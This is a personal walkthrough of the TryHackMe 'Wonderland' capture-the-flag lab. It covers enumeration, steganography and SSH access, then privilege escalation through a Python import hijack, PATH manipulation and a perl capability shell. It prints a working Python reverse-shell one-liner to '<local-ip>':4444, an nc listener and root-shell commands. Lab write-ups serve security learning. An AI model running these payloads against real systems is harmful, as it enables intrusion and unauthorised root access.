Try it yourself here: TryHackMe | Wonderland
Enter Wonderland and capture the flags.
DAD NOTICE: I'm a dad with a full time job. You'll likely see changes in IP's and possibly screens of the systems I'm using. This is because it's very rare I get more than a few minutes here and there to do this so I pick it up through the week... or I got stuck and it's taken me days to figure it out.Okay, so as always we start with a nmap, showing us an SSH port and an HTTP server using Golang.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-20 17:40 EST
Nmap scan report for 10.10.235.15
Host is up (0.095s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8eeefb96cead70dd05a93b0db071b863 (RSA)
| 256 7a927944164f204350a9a847e2c2be84 (ECDSA)
|_ 256 000b8044e63d4b6947922c55147e2ac9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
The website isn't anything fancy and there's nothing hidden in the source code. There's no robots file either. All we're provided is an image.
In fact, we can see all the images if we go here:
http://10.10.235.15/img/ Well, let's follow the suggestion and follow the white rabbit... sheesh, I'm feeling very Neo right now. We download the white_rabbit_1.jpg file and check the contents of it with steghide.
$ steghide info white_rabbit_1.jpg
"white_rabbit_1.jpg":
format: jpeg
capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "hint.txt":
size: 22.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
$ cat hint.txt
follow the r a b b i t Ok.... I did that... oddly spaced rabbit though... What's interesting though is the goboster I was running while working on this shows a folder that perks my interest
$ gobuster dir -u http://10.10.235.15 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-bi
<snip...>
/img (Status: 301) [Size: 0] [--> img/]
/r (Status: 301) [Size: 0] [--> r/]
/poem (Status: 301) [Size: 0] [--> poem/]
/http%3A%2F%2Fwww (Status: 301) [Size: 0] [--> /http:/www]
/http%3A%2F%2Fyoutube (Status: 301) [Size: 0] [--> /http:/youtube]
/http%3A%2F%2Fblogs (Status: 301) [Size: 0] [--> /http:/blogs]
/http%3A%2F%2Fblog (Status: 301) [Size: 0] [--> /http:/blog]
/**http%3A%2F%2Fwww (Status: 301) [Size: 0] [--> /%2A%2Ahttp:/www]We're on the right track
We follow that folder structure all the way through to get to the final page, that shows us that final PNG image of Alice
Now if we do a view source on this page we see something hidden:
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:[REDACTED]</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>Doing a bit of research I find that this poem is about deception and predication. It's also voiced by Richard Haydn, the caterpillar in the Alice movie. Speaking of poem, it looks like our gobuster has found a sub-folder for that too. Visiting that page gives us a poem about the Jabberwocky, another poem from the movie by Lewis Carroll (yeah that's right.. I don't read... only watch). At this point in the CTF I'm feeling very much like Alice: "Somehow it seems to fill my head with ideas—only I don't exactly know what they are!"
OK, well that first find kinda looks like a username:password combo - so I'll try it on the SSH port. Bingo.
$ ssh alice@10.10.235.15
<snip...>
alice@10.10.235.15's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
<snip...>
alice@wonderland:~$ There is a BUNCH of interesting stuff right out of the gate. First, we see the root flag but we of course don't have access. Next, we see a python script called "walrus_and_the_carpenter.py"... but is this something to get us root?
alice@wonderland:~$ ls -la
<snip...>
-rw------- 1 root root 66 May 25 2020 root.txt
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.pyThe hint for this is being upside down... well if the root.txt file is here.... perhaps the user.txt file is in root? We don't have access to list files so let's just go for it:
cat /root/user.txt
[ REDACTED ]OK, well now we need to escalate some privileges. Let's check for sudo permissions on this little girl.
alice@wonderland:/$ sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.pyOK. so here's what we're going to do. If we cat out that walrus script, we see it's importing the random function. Using some ideas from this page: https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/ we're going to create our own random.py file in our home directory (because imports will always look in the home directory first) and give it a reverse shell script.
import socket,os,pty;s=socket.socket();s.connect(("<local-ip>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")Then we run a listener at catch it as rabbit.
nc -lvnp 4444Lastly we run the python script as rabbit
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py Doing a list of the rabbit's home folder... there's an SUID binary there. Running it gives us a notice that the Mad Hatter should be here soon.
if we use xxd to view the binary, we can see that it's attempting to call the Date function to set it an hour ahead to meet the Hatter.
OK, so because date isn't being called from an absolute path, we can add the tmp directory to our path and run our own version of it. We'll use this page as our template: https://systemweakness.com/linux-privilege-escalation-using-path-variable-manipulation-64325ab05469 First we add tmp to our path directory.
rabbit@wonderland:/home/rabbit$ export PATH=tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binnow we create our own shell script and set the file to executable. Here's the binary we're going to make:
rabbit@wonderland:/home/rabbit$ echo /bin/bash > /tmp/date
rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ whoami
whoami
hatter
hatter@wonderland:/home/rabbit$ We still can't read the root.flag yet and we can't sudo -l because we don't know the hatter's password. There is however a password is the home directory
hatter@wonderland:/home/hatter$ ls -la
<snip...>
-rw------- 1 hatter hatter 29 May 25 2020 password.txt
hatter@wonderland:/home/hatter$ cat password.txt
[ REDACTED ]Well, let's try to sudo -l... nope. Can't run ANYTHING on this box. Okie Dokie... well... let's re-do our list of privesc techniques. Looks like we have a winner with capabilities. First we search for the list of files set with cap_setuid and then using gtfobins we find the command to run to get a new shell.
hatter@wonderland:~$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami
root
# cat /home/alice/root.txt